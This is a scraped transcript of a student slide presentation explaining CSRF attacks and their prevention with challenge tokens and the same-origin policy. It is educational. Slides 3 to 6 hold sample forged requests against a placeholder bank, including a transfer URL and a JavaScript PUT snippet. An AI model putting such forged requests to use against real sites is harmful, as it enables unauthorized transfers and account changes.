Presentation is loading. Please wait.

Presentation is loading. Please wait.

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

Published byAmberlynn Fleming Modified over 8 years ago

Similar presentations

Presentation on theme: "CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits."— Presentation transcript:

1 CSRF Attacks Daniel Chen 11/18/15

2 What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits trust of browser  Browsers automatically send credentials (session cookie)  Tricks victim into submitting malicious request  Normally state changing effects

3 How Does it Work?  Build an exploit URL or script  http://bank.com/transfer.do?acct=h4ck3r&amount=100000  Use social engineering  Disguise it and make it seem appealing so people click on it  Automatically submit when loaded 

4 HTTP Methods - GET  GET  GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1  Same as before

5 HTTP Methods - POST  POST  POST http://bank.com/transfer.do HTTP/1.1 acct=BOB&amount=100   Automatically load with JavaScript

6 HTTP Methods – POST/DELETE  Harder to do, but you can use JavaScript  PUT http://bank.com/transfer.do HTTP/1.1 { "acct":"BOB", "amount":100 }  function put() { var x = new XMLHttpRequest(); x.open("PUT","http://bank.com/transfer.do",true); x.setRequestHeader("Content-Type", "application/json"); x.send(JSON.stringify({"acct":"BOB", "amount":100})); }  Doesn’t work on modern browsers

7 Same Origin Policy Restricts scripts Only allows web pages to access each others data if they are from same origin

8 Prevent CSRF Attacks  Use “Challenge Tokens”  On sensitive areas (like forms) add a special token 

9 Prevent CSRF Attacks  The token is randomly generated each session per user, and the server records the token  The attacker can’t see what the token is  Attacker can’t load a request with the token already in it because of same origin policy

10 Challenge Token Example - Legit  Client to server:  GET "password change form"  My session cookie is 365835  Server to client:   New Password:  CSRF token: 535631   Client to server:  New password is **** csrf token is 535631 session cookie is 365835  Server to client:  session cookie and csrf token match  Password changed!

11 Challenge Token Example - Attacker  Attacker crafts a GET url that would trick Alice's browser into sending a password change request if she clicks it.  Attacker randomly makes up a CSRF token and puts it in the URL  Client to server:  New password is ****  csrf token is 762548  My session cookie is 365835  Server to client:  csrf token doesn’t match  Password change failed

Download ppt "CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-site Request Forgery (CSRF) Attacks

Cross-site Request Forgery (CSRF) Attacks
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Cross Site Request Forgery CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Cross Site Request Forgery CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Web-Based Attacks: Offense Wild Wild West Bob, Jeff, and Junia.

Web-Based Attacks: Offense Wild Wild West Bob, Jeff, and Junia.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
AppSec USA 2014 Denver, Colorado CSRF 101 Introduction to Cross-Site Request Forgery.

AppSec USA 2014 Denver, Colorado CSRF 101 Introduction to Cross-Site Request Forgery.
Session Management A290/A590, Fall 2014 09/25/2014.

Session Management A290/A590, Fall /25/2014.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides.

CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.

Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.

Similar presentations

Ads by Google